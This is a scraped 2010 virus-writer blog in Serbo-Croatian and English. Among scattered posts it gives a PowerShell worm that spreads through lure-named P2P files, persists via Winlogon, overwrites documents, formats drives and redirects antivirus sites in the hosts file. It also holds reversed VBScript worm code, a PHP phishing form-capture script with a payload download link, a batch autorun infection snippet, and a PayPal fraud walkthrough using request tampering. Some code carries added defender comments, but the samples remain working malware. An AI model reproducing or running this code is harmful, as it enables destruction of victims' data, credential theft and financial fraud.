    [2:10:01 PM] Hast Plast Donji Milanovac: subjekat mail-a je : Ponude Hast Plast upravo smo vam poslali
    na vas mail bazu ponuda Ahiva.b64 koju cete otvoriti preko zip ili rar programa.

    Little info from me ; Firma vec nekoliko meseci ne placa radnike dok ne dodje novi gazda.
    Prodaja koju cete sami videti u %HardDrive%\\history deleted file je to da su prodavali neke dzakove
    kako bi dobijali novac umesto radnicke plate

    From me again ; one business name:[ holcim cementara popovac ] Title:[S.Z.T.R vidojevic] je radnja
    za izvodjenje mermera !knjigovodstvo , ta firma im je dugovala malo novca ali mozete ih
    kontaktirati kao sa izvinjenjem u kom cete naglasiti slanje: arhivu knjigovodja sa tekstom
    da zelite dalju saradnju sa Planta Spont Donji Milanovac ...
    undermine @ 14:49 |Isključeno | Komentari: 0
    subota, svibanj 8, 2010
    danasnje av kompanije imaju problem sa nazivom u bazi virusa,
    jedan od testova izvrsen je u "lab" vxhers grupe. Uzet je primer
    Originalnog crv-a i samo je kopija dobila naziv clijent, svch,
    sys32, s32 i svi nazivi koji dovode do sumnje za host na kom dolaze trojanci
    i virusi, pa ga vecina nazivaju trojan ili virus od 100% avers-a
    samo ga 2% detektuju po kodiranju ostali ga detektuju po samom nazivu
    koji je maskiran u imenu tokom kreiranja...

    Zakon o kreiranju virusa, je prekticna suprotnost od onoga sto vecina
    vxers misli u srbiji a to je hehe zatvor, recicu vam sada nesto i o tome
    ako ste kreirali trojanca crva ili originalni doom virus, morate imati
    dobar smisljeni plan uz neki sajt sa kog cete ga poslati zrtvama, kao sto
    je naprimer porno sajt gde cete ubaciti vasu tehnicku funkciju. Ukoliko vas
    neka firma pronadje dobro je imati takav sajt koji cete ubaciti u computer
    te firme i dobro ga sakriti ukoliko vam pocne sudjenje imate svoj dokaz jer
    firme koje se bave milionima evra ne smeju posecivati sajtove kao sto su porn.com
    i slicni sajtovi na kojima se moze dobiti otvoreni prolaz, kao i sama rec
    vecine avers-a glasi : " Ni po koju cenu nije dobro posecivati bilo koje sajtove,
    sto mogu instalirati virus u vasem computer-u i zatim naneti stetu koju posle morate
    odkloniti samo celim formatiranjem harddisk-a. " Ukoliko neki radnik poseti vas sajt
    ili krene sa poslovnog computer-a da chat-uje s'vama samim tim budite svesni da je i njemu
    zabranjeno poslovnim computer-om ulaziti na sajtove koji nisu deo poslovne firme...

    "Zapamtite samo deklaraciju "19" ili je procitajte tu vam je taj zakon za sve demokratske
    i ujedinjene drzave"....

    font: tahoma[cro-rs]
    by Branko D Tomic
    undermine @ 12:45 |Isključeno | Komentari: 0
    subota, travanj 24, 2010
    Prvi korak :
    Hunatcha je baziran za vecinu tehnickih komponenta, ukljucujuci
    * Infekciju fajlova i sobe diskova - ali korisnik mora imati u vidu
    vec neki zarazeni fajl koji ce dati do znanja crvu da je inficiran, slutio sam
    da ce vecina pomisliti da je worm startajuci pomocnik virus-a ali vecina odnosno mnogi grese .
    Princip crva je bolji osecaj rada kada primeti inficirani fajl, a sobe diskova ili drives
    mogu slobodno reci da je spoj sa masinom odnosno sobom u kojoj se nalazi baza za infekciju.
    * Proces koji sami vidite daje mu znatno bolju sigurnost sirenja kroz P2P
    kao sto su fajlovi za verovanje i to je mnogo bitno('users_info.txt.exe') , ('info download.txt.exe')
    ostanimo na ovim fajlovima primerom kada neko zeli videti detaljnije sta moze skidati naravno da ce otvoriti
    masku koja mu se pokazuje kao tekstualnost.
    * Taskkill je veoma dobro radjena tehnika uz system kroz neverantivirus daje crvu sigurnost prolaza
    i pozeljno je dopunjavati taj deo. primetio sam da f-sec i jos neki avers-i detektuju ali ono sto je bitno
    on ipak ispuni svoj deo posla tako da vas ne treba plasiti ako je detektovan.

    Drugi korak: (definicija Port 21)
    port 21 je spremljen za sve one koji vole preko port-a ulaziti i otimajuci bazu svih fajlova
    preko zakljucanog port-a za download i upload. Naravno da mozete raditi sa
    preko port-a 21 jer su oni vec i u systemu inficiranog kompjutera.

    Treci korak:
    Ocekuje se od vas dopuna i tehnika vec poznatih username/password
    i naravno imacete pristupacnije delove rada u windows visti i se7en.
    dok u xp vec je odobren pristup na vecini kompjuter-a , nadam se da shvatate?
    kad smo vec kod tehnike vratimo se definiciji 21 port mozete vec raditi sa poznatim
    virus-ima iz sobe 21 dok za se7en ce vam trebati ovaj treci korak . U ovom delu dolazi
    i poruka za avers-e koja glasi kodom :
    static char *msg_to_avers = "We never stop to make your business!";
    Da to sam im hteo reci jer sto se oni zale i prave da nisu zadovoljni zlonamerom, kada
    je to njihova takodje zarada da nije virus-a nebi bilo ni anti-virusa .
    undermine @ 02:14 |Isključeno | Komentari: 0
    petak, travanj 16, 2010
                                                --.----.----.
    undermine @ 10:27 |Isključeno | Komentari: 0
    četvrtak, travanj 15, 2010
    '"sbv.23metsys\swodniW\:D | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:E | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:F | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:G | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:H | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:I | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:J | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:K | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:L | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    'emaNlluFtpircS.tpircsW = flesym
    'txen emuser rorre nO
    ')cepsredlof(eheh buS
    'txeN emuseR rorrE nO
    'osf ,s ,txe ,cf ,1f ,f miD
    ')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = osf teS
    ')cepsredlof(redloFteG.osf = f teS
    'seliF.f = cf teS
    'cf nI 1f hcaE roF
    ')htaP.1f(emaNnoisnetxEteG.osf = txe
    ')txe(esaCL = txe
    ')emaN.1f(esaCL = s
    'nehT )"iva" = txe( rO )"gepm" = txe( fI
    ')emanlluftpircs.tpircsw(elifteg.osf = f teS
    ')"sbv." & htaP.1f( ypoC.f
    'fI dnE
    'txeN
    'buS dnE
    ')cepsredlof(ihih buS
    'txeN emuseR rorrE nO
    'osf ,fs ,1f ,f miD
    ')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = osf teS
    ')cepsredlof(redloFteG.osf = f teS
    'sredloFbuS.f = fs teS
    'fs nI 1f hcaE roF
    ')htaP.1f( eheh
    ')htaP.1f( ihih
    'txeN
    'buS dnE
    undermine @ 03:58 |Isključeno | Komentari: 0
    četvrtak, travanj 8, 2010
    Moguce je preko paypal opcije to uraditi, potrebno je samo
    znati kako da kreirate paypal internet racun zatim preko nekog sajta
    koji vam daje virtual money u prevodu da objasnim ( virtualne chipove )
    zaradite ih oko $ 20 dolara na primer i zatim skinite sa mozilla addons
    https://addons.mozilla.org/en-US/firefox/addon/966
    instalirajte restartujte browser i udjite na www.fastinvestpro.com
    registrujte se opcijom account-a preko paypal zatim izaberite
    opcije za daily plan plan koja je spojena sa instant withdrawal. nemojte samo ici
    u  bigger plans.

    dajte deposit od $10 sa vaseg paypal gde vam je virtualni novac
    i uradite sign out
    sacekajte 1 minut i ulogujte se, zatim u vas account videcete
    $ 10 dolara na vas account kliknite zatim opciju
    withdrawal, enter amount $ 10
    ali pre klika na dugme ( button )

    udjite u  firefox browser tools koji ste skinuli kliknite tamper data
    i malo prozorce startuje tamper(ne zatvarati ovo ) udjite u withdrawal page i kliknite request
    zatim sledeci windows(prozor) Tamper uz request se otvara i kliknite tamper

    zatim se drugi windows otvara, i levo
    nacicete parameter value zatim u broj 10.00 stavite 99.00 ne stavljati preko 99 jer opcija
    koju sadrzi bug
    nacinjena je za samo 2 digitalna broja
    Udjite u vas account na paypal i videcete prebaceni novac.
    PAZLJIVO OVO URADITI JER MOZETE UZGUBITI I BONUS OD $5 KOJI STE PREBACILI
    ZATO IPAK ODRADITE $50 VIRTUALNOG NOVCA NA RACUN PAYPAL
    I TO MOZETE SAMO DVA PUTA PREBACITI PREKO VIRTUALNOG KOMPJUTERA
    I ADMINISTRATOR-skog....
    undermine @ 19:50 |Isključeno | Komentari: 0
    srijeda, travanj 7, 2010
    A worm is malware that is designed to propagate and spread across networks.
    Worms are known to propagate using one or several different transmission vectors,
    such as email, IRC, network shares, instant messengers (IM), and peer-to-peer (P2P) networks.
    Worms do not infect files, but may carry one or more payloads,
    such as computer security compromise and information theft.
    Worms typically modify system settings so that they start automatically.
    Worm after start cannot be terminated.
    [ DOWNLOAD ] - www.4shared.com/file/258603683/10ad2366/Eldorado131.html
    undermine @ 01:38 |Isključeno | Komentari: 0
    utorak, ožujak 30, 2010
    Example way to get login with fake html and also
    get ip address for worm ride can try from your own server.
    Everybody know how look page application and blue button
    in that way, put your Koobface.ara and when stupid people
    click at blue button worm start open some application
    wher first time you go and grab html code enter on the other side,
    and rename location of real link then put your server.
    That code is :
    - -
    <?php
    // Form-capture handler as published: it takes whatever a form POSTs to it,
    // stores the fields in a file on the server, and points the browser at
    // facebook.com.
    // Defender view: a server-side script that dumps raw $_POST fields to a local
    // file and answers with a Location header to the genuine site is a recurring
    // phishing-kit pattern. Web-root file integrity monitoring, review of
    // unexpected PHP files, and alerting on growing data files next to them
    // surface it.

    // Redirect header is queued first; the statements below still run before exit.
    header ('Location: http://www.facebook.com/user info/');
    // Relative path, so the file lands wherever the script runs; the mode string
    // is "ara" exactly as printed.
    $handle = fopen("Setup.exe", "ara");
    // One "name=value" line per submitted field.
    foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
      
    }
    // Blank line separates one submission from the next.
    fwrite($handle, "\r\n");
    fclose($handle);
    // $date and $ip are assigned but never written anywhere in this listing;
    // getIP() is not defined in the visible code.
    $date = date('');
    $ip = getIP();
    exit;
    ?>
    - -
    You can add other page at facebook like '/heart&embrace/' or
    '/Google video Reader/' Don't forgot add this setup.exe
    from this trial share way http://www.speedyshare.com/files/21690946/Setup.exe
    undermine @ 17:56 |Isključeno | Komentari: 0
    nedjelja, ožujak 21, 2010
    From: "Microsoft Window Mail Team" <osoft@microsoft.com>
    To: "Windows Mail User" <@microsoft.com>
    Subject: Welcome to Windows Mail
    Date: Sun, 29 Dec 1978 13:34:34 -0700
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
     boundary="----=_NextPart_000_0000_01CAC8FC.3FCF2B70"
    X-MimeOLE: Produced By Microsoft MimeOLE V7.0.7000.06660
    X-EsetId: DEA99D2831FE7D69C1AF9D7D3DA539
    X-EsetScannerBuild: 6791

    This is a multi-part message in MIME format.


    undermine @ 21:39 |Isključeno | Komentari: 0
    utorak, ožujak 16, 2010
    This Virus work on Xp&Vista

    undermine @ 00:05 |Isključeno | Komentari: 0
    petak, ožujak 5, 2010
    nesto sam testirao pa pronasao sasvim dobar  nacin ubacivanja infekcije,
    kroz batch kojeg sam nazvao command prompt ekstenzijom ukljucuje dopunu
    u vista O.S i ubacuje bag ...

    rem Batch fragment as published by the author.
    rem NOTE(review): %bug% and %remote_address% are never set in the visible lines,
    rem so read this as a list of indicators rather than as a complete script.
    rem Indicators visible here: C:\autorun.cmd, a binary named windowsupdatess.exe
    rem (note the doubled "s"), and a write to HKCU\Software\Sysinternals\Autorun.
    cls
    type %0 "C:\autorun.cmd"
    for %a in ("*.cmd") do call %0 C:\autorun.cmd
    if %bug% x -t"%remote_address%" -y+ %bug%
    move %bug% in %remote_address%
    ..\windowsupdatess.exe x -t"%remote_address%" -y+ file:\\\autorun.cmd
    rem Sets EulaAccepted=1 under a Sysinternals key; presumably meant to suppress a
    rem licence prompt -- confirm which tool, if any, reads this key.
    REG ADD HKCU\Software\Sysinternals\Autorun /v EulaAccepted /t REG_DWORD /d 1 /f
    start "" "%remote_address%\autorun.cmd"
    undermine @ 20:44 |Isključeno | Komentari: 0
    subota, veljača 27, 2010
    Chat bar hacked is !
    Da i to veoma ne zasticenim kodom a ujedno se moze spijunirati tudja chat
    privatnost ukoliko znate raditi sa Id korisnickim kodom odnosno linkom faceuser
    I' show u code in jscript :
    http://www.facebook.com/presence/popout.php?init_port=5312
    Full window? yes if you work with your upgraded code. But all for this is greatz port !
    inace druge uloge scripting-a mozete sami dodavati .
    undermine @ 01:42 |Isključeno | Komentari: 0
    četvrtak, veljača 25, 2010
    Vecina zeli na najbrzi nacin zaraditi preko interneta jedan od nacina
    je dobar dok drugi sebe prestavlja i kao fake, dobar nacin je legalnost
    zarade jer ocekuje klik ali ne na sajtove vec na vas izabrani sajt i nemora se niko
    logovati.
    Drugi nacin zahteva poznavanje script-e i znanje komunikacije odnosno u ovom
    slucaju poznavanje zapisa .... lako je u koliko procitate deo po deo ...
    LINK: http://adf.ly or look hostbux.com
    undermine @ 03:35 |Isključeno | Komentari: 0
    srijeda, veljača 24, 2010
    Command Prompt (DOS) batch files
    Batch files are the oldest scripts and probably the easiest to write on a
    PC, but they’re severely limited in what they can do. Batch files, not to
    mention the Command Prompt itself, are handy for copying or renaming
    files based on wildcard character specifications, for instance. But
    they can’t interact with Windows programs, and have no knowledge of
    running processes, security policies, or any of your other favorite Vista
    buzzwords. On the plus side, you can run a batch file on any PC made
    after 1982, regardless of the version of Windows being used, and the
    DOS commands used therein can also be used to recover your PC in the
    event it won’t start.
    Windows Script Host scripts
    WSH scripts are more flexible and powerful than batch files, and offer
    better user interaction. WSH scripts are Windows-based, and can take
    advantage of Windows services, such as printing, networking, and Registry
    access. WSH scripts work on any PC running Windows 98 or later,
    or Windows 95 and Windows NT 4.0 after installing an add-on. Unfortunately,
    these days they’re seen as a system vulnerability, to the point
    of being blocked by some modern antivirus software, and despite having
    been around for about a decade, they’re still pretty feeble when
    compared to the kind of scripting found on Unix/Linux systems.
    Windows PowerShell scripts
    Designed to address the shortcomings of WSH scripts, Microsoft’s
    PowerShell (also known as MSH, or the Monad Shell) is somewhat the
    ideal scripting solution. PowerShell is more or less a replacement for the
    Command Prompt, and its scripting feature is only part of the package.
    In some cases, even a single line entered by hand at the PowerShell
    prompt can do more than a complex batch file or WSH script. But since
    PowerShell is not installed by default in Vista, you can’t ever assume it’s
    there, thus making it more useful as a personal tool than as a platform
    for scripts to distribute to other PCs.
    Which scripting platform you choose should depend on your comfort level
    and familiarity with the language, as well as the task.
    Port Number Description
    20–21 FTP (File Transfer Protocol)
    22 SSH (Secure Shell)
    23 Telnet
    25 SMTP (Simple Mail Transfer Protocol), used for sending email
    42 WINS (Windows Internet Name Service)
    43 WhoIs
    50–51 IPSec (PPTP Passthrough for VPN, Virtual Private Networking)
    53 DNS (Domain Name System), used for looking up domain names
    67 DHCP (Dynamic Host Configuration Protocol)
    69 ? TFTP
    70 Gopher
    79 Finger
    80 HTTP (Hyper Text Transfer Protocol), used by web browsers to download standard web pages
    110 POP3 (Post Office Protocol, version 3), used for retrieving email
    119 NNTP (Network News Transfer Protocol), used for newsgroups
    123 NTP (Network Time Protocol), used for Windows’ Internet Time feature
    135 ? RPC (Microsoft Windows Remote Procedure Call)
    137–139 ? NETBIOS Services
    143 IMAP4 (Internet Mail Access Protocol version 4)
    161–162 SNMP (Simple Network Management Protocol)
    194 IRC (Internet Relay Chat)
    220 IMAP3 (Internet Mail Access Protocol version 3)
    undermine @ 14:11 |Isključeno | Komentari: 0
    Money Transfer
    set undermine your home page
    Ads Pay Pal Alert Pay Web Money My vacation is your 2% security ...
    how i' get webmoney, enable jscript or better browser
    then read my alert window...
     
    Warning!!!This wrapper provides human rights of malicious people! © 2010 Undermine. All Rigths Classed in 19 Article of Universal Declaration.

    Sharez-Worm.Branko.compcode
    My wing is unknown look up on stars VX is way to heaven not difficult to go when
    time come I' know bcoz I' coming from bloody rain, and don't think you are all
    on strange and this promise land. Wher is your soul,heart,lifelove?
    Bcoz you're destructed angel.
    Worm.html
    # UnderminE alias Luxilius's Powershell Skript Worm
    #
    # This worm is for the PowerShell Script Interpreter
    # which is included with Microsoft Windows Vista
    #
    # This worm is ¸2008 by underminE alias Luxilius
    #
    # Visit my homepages: www.underminE.bloger.hr & www.underminE.bloger.hr & www.underminE.bloger.hr
    #
    # This worm has following features:
    #
    # - Spreads with P2P (KaZaA Lite) per JScript
    # - Writes a registry string to run every time windows starts
    # - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
    # - overwrites specific files in Eigene Dateien Folder and Subfolders
    # - formating all insertet drives and discettes
    # - deletes files in %system32%\drivers\etc
    # - overwrites the host file in %system32%\drivers\etc
    # - kills some well-known Anti-Virus processes
    # - deletes Reg-Values from well-known Antiviruses
    # - tells a message to user, with informations about the worm
    #
    #
    # Informations:
    #
    # This worm is a proof of concept worm. Because of it is able
    # to run Powershell on Windows XP, too (Need .Net Framework 2.0)
    # this worm is dedicated to Windows XP. Well, yes, it runs on
    # Windows Vista, too. But I don't know if the structures are the
    # same as in windows Xp. Note that this worm uses ActiveX Objects.
    # In this worm I use Scripting.FileSystemObject and WScript.Shell
    # Object. I hope Vista will include those ActiveX Objects, too.
    # I am happy to be the coder of this worm. I like this language.
    # And I am looking forward to new Malware in PowerShell.
    # Now I will release more and more worms in this language.
    #
    # This worm is ¸2008 by underminE alias Luxilius. To tell me anything
    # write me an email @ hard.rock.blogger@gmail.com or a pm at www.underminE.bloger.hr
    #
    # ======================================================================

    # Setup, self-copy and registry changes of the specimen.
    # Defender summary of this section: it uses the Scripting.FileSystemObject and
    # WScript.Shell COM objects, drops a copy named WinLuxUndermine.msh in the
    # system folder, seeds a Kazaa share folder with lure-named copies, and rewrites
    # several HKCU/HKLM values, including Winlogon\Shell.
    $fso = New-Object -Com Scripting.FileSystemObject ;
    $wshs = New-Object -Com WScript.Shell ;
    # GetSpecialFolder(0) is the Windows folder, GetSpecialFolder(1) the system folder.
    $windir = $fso.GetSpecialFolder(0)
    $sysdir = $fso.GetSpecialFolder(1)

    # Banner strings; they are echoed at the end of the script.
    $strInfoString_one = "This is a PowerShell Script worm. ";
    $strInfoString_two = "This worm is proof-of-concept ";
    $strInfoString_three = "the worm is ¸2008 by underminE alias Luxilius ";
    $strInfoString_four = "for informations write an email @ hard.rock.blogger@gmail.com ";


    # Reads the Kazaa download/share directory from the current user's registry hive.
    $KazaaDir = $wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir');
    # Self-identification: walks the *.msh files in the current directory and uses
    # the literal 13035 against each file's Length (presumably the specimen's own size).
    $AllMshDateinCurDir = get-childitem *.msh
    foreach ($PowerShellScript in $AllMshDateinCurDir)
    {
      if ($PowerShellScript.Length=13035)
      {
        $MySelfWorm = $PowerShellScript.Name;
      }
    }
    $gtFilesMsh = $fso.getfile($MySelfWorm);
    # Drop location in the system folder; the file name WinLuxUndermine.msh is a
    # usable host indicator.
    if (!$fso.fileexists($Sysdir.Path\WinLuxUndermine.msh)
    {
        $gtFilesMsh.Copy($Sysdir.Path\WinLuxUndermine.msh);
    }
    # P2P propagation: copies placed in the share folder under names imitating
    # key generators, cracks and installers, all ending in .msh. Script files with
    # such names in a P2P share directory are a detection opportunity.
    $gtFilesMsh.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh");
    $gtFilesMsh.copy("$KazaaDir\Windows Vista Update.msh");
    $gtFilesMsh.copy("$KazaaDir\Ad-aware SE Personal Edition 1.06r1.msh");
    $gtFilesMsh.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh");
    $gtFilesMsh.copy("$KazaaDir\Allround WinZIP Key Generator.msh");
    $gtFilesMsh.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Nero Burning Rom 6.6.0.13 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Kaspersky KeyGen working.msh");
    $gtFilesMsh.copy("$KazaaDir\Daemon Tools Install + Crack.rar.msh");
    $gtFilesMsh.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh");


    # Explorer view settings: Hidden and HideFileExt. HideFileExt=1 makes Explorer
    # hide known file extensions, presumably so the lure names look less conspicuous.
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD");
    # Cosmetic defacement values (registered owner/organisation, IE window title).
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "United People of infected Ps","REG_SZ");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "underminELuxilius","REG_SZ");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected with Ps Worm by underminE alias Luxilius","REG_SZ");
    # Persistence: Winlogon\Shell normally holds just "explorer.exe"; any extra
    # argument or path in this value deserves an alert. Restoring the default value
    # is part of clean-up.
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe  $sysdir.Path\WinLuxUndermine.msh" ,"REG_SZ");
    # Browser start page is pointed at the author's blog.
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.underminE.bloger.hr")


    # Resolves the user's documents folder ("Personal" shell folder) and hands it
    # to the file-overwriting routine.
    $PersonalDirectory = $wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal");
    UeberschreibeDateien($PersonalDirectory)

    # UeberschreibeDateien (German: "overwrite files") is the destructive payload
    # that the header's feature list describes as overwriting specific files in the
    # documents folder and its subfolders.
    #   $strOrdner - folder to process; the routine calls itself for each subfolder.
    # Impact for responders: targeted files are replaced by a short text marker, so
    # the original content can only come back from backups or shadow copies.
    # Indicator: documents/media whose whole content is the marker text
    # "This file was overwritten with a Ps Worm. ...".
    function UeberschreibeDateien($strOrdner)
    {
        # Marker text written in place of the original file content.
        $StringToOverwrite = "This file was overwritten with a Ps Worm. ";
        $StringToOverwrite += "This Worm is ¸2008 by underminE alias Luxilius! ";
       
        # Folder object plus its file and subfolder collections.
        $OverWrtOwnFiles = $fso.getfolder($strOrdner)
        $OverFiles = $OverWrtOwnFiles.Files
        $TheSubFldr = $OverWrtOwnFiles.subfolders
       
        # One branch per targeted extension (images, audio/video, Office documents,
        # archives, C++ sources). Every branch has the same two steps: delete the
        # path, then append the marker text to that same path.
        foreach ($SubFiles in $TheSubFldr.Files)
        {
            $strGetExt = $fso.GetExtensionName($AlleDateien.Path);
            if ($strGetExt="JPG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="BMP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="GIF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PNG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="JPEG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="AVI")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="MP3")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMV")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMA")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="DOC")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="XLS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RTF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPT")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="ZIP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RAR")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="CPP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
        }
       
        # Recursion into each subfolder.
        foreach ($NochMehrUnterOrdner in $TheSubFldr)
        {
            UeberschreibeDateien($NochMehrUnterOrdner)
        }

    }

    # Drive-wiping step from the header's feature list. It walks the
    # FileSystemObject drive collection and invokes `format <path> /y` for
    # DriveType 1 (removable) and DriveType 2 (fixed).
    # Defender view: a script host spawning format.com is rare on end-user systems
    # and is worth a process-creation alert.
    $TheDrives = $fso.Drives
    foreach ($AllDrives in $TheDrives)
        {
        if ($AllDrives.DriveType=1)
        {
            format $AllDrives.Path /y
        }
        if ($AllDrives.DriveType=2)
        {
            format $AllDrives.Path /y
        }
    }


    # Name-resolution tampering. In <system folder>\Drivers\etc the script deletes
    # networks, protocol, services, hosts and hosts.bak, then rebuilds hosts so that
    # antivirus vendors, online scanners, Windows Update/Microsoft, search engines,
    # webmail, ISPs, news sites and police/FBI sites resolve to 127.0.0.1.
    # Detection: file integrity monitoring on Drivers\etc; hosts entries that map
    # security-vendor or update domains to loopback; the comment line
    # "# Host File overwritten by Ps Worm".
    # Recovery: restore hosts, networks, protocol and services from a known-good
    # source and flush the resolver cache.
    cd "$sysdir.path\Drivers\etc";
    del "networks";
    del "protocol";
    del "services";
    del "hosts";
    del "hosts.bak";
    echo "# Host File overwritten by Ps Worm " >> hosts
    echo "# This file disallows you to visit av and dl sites :> " >> hosts
    echo " " >> hosts
    echo "127.0.0.1 www.antivir.de " >> hosts
    echo "127.0.0.1 www.bitdefender.de " >> hosts
    echo "127.0.0.1 www.znet.de " >> hosts
    echo "127.0.0.1 www.chip.de " >> hosts
    echo "127.0.0.1 www.virustotal.com " >> hosts
    echo "127.0.0.1 virusscan.jotti.org " >> hosts
    echo "127.0.0.1 www.kaspersky.com " >> hosts
    echo "127.0.0.1 www.sophos.de " >> hosts
    echo "127.0.0.1 www.trojaner-info.de " >> hosts
    echo "127.0.0.1 www.trojaner-help.de " >> hosts
    echo "127.0.0.1 www.arcabit.com " >> hosts
    echo "127.0.0.1 www.avast.com " >> hosts
    echo "127.0.0.1 www.grisoft.com " >> hosts
    echo "127.0.0.1 www.bitdefender.com " >> hosts
    echo "127.0.0.1 www.clamav.net " >> hosts
    echo "127.0.0.1 www.drweb.com " >> hosts
    echo "127.0.0.1 www.f-prot.com " >> hosts)
    echo "127.0.0.1 www.google.de " >> hosts
    echo "127.0.0.1 www.google.com " >> hosts
    echo "127.0.0.1 www.google.co.yu " >> hosts
    echo "127.0.0.1 www.fortinet.com " >> hosts
    echo "127.0.0.1 www.eset.com " >> hosts
    echo "127.0.0.1 www.nod32.com " >> hosts
    echo "127.0.0.1 www.norman.com " >> hosts
    echo "127.0.0.1 www.microsoft.com " >> hosts
    echo "127.0.0.1 www.anti-virus.by/en " >> hosts
    echo "127.0.0.1 www.symantec.com " >> hosts
    echo "127.0.0.1 www.windowsupdate.com " >> hosts
    echo "127.0.0.1 www.trendmicro.com " >> hosts
    echo "127.0.0.1 www.mcafee.com " >> hosts
    echo "127.0.0.1 www.viruslist.com " >> hosts
    echo "127.0.0.1 www.avp.com " >> hosts
    echo "127.0.0.1 www.zonelabs.com " >> hosts
    echo "127.0.0.1 www.heise.de " >> hosts
    echo "127.0.0.1 www.antivirus-online.de " >> hosts
    echo "127.0.0.1 www.free-av.com " >> hosts
    echo "127.0.0.1 www.panda-software.com " >> hosts
    echo "127.0.0.1 www.pc-welt.de " >> hosts
    echo "127.0.0.1 www.pc-special.net " >> hosts
    echo "127.0.0.1 download.freenet.de " >> hosts
    echo "127.0.0.1 www.vollversion.de " >> hosts
    echo "127.0.0.1 www.das-download-archiv.de " >> hosts
    echo "127.0.0.1 www.freeware.de " >> hosts
